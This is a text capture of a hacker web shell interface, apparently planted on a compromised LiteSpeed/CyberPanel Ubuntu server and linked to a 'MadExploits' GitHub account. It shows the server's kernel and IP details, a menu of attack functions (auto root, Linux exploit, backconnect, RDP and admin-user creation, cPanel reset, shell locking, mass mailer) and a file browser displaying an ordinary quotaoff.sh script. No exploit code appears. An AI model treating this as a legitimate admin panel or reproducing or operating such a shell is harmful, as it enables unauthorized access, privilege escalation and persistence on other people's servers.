Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
quota /
[ HOME SHELL ]
Name
Size
Permission
Action
ldap
[ DIR ]
drwxr-xr-x
quota-initial-check.sh
675
B
-rwxr-xr-x
quotaoff.sh
294
B
-rwxr-xr-x
quotaon.sh
2.72
KB
-rwxr-xr-x
quotarpc.sh
1012
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : quotaoff.sh
#!/bin/sh # names of binaries off=/sbin/quotaoff quotaisoff=/var/lib/quota/off ALLFLAGS=-aug set -e . /lib/lsb/init-functions if [ -x $off ] then log_action_begin_msg 'Turning off quotas' $off $ALLFLAGS || true # Create quota-off file touch $quotaisoff log_action_end_msg 0 fi exit 0
Close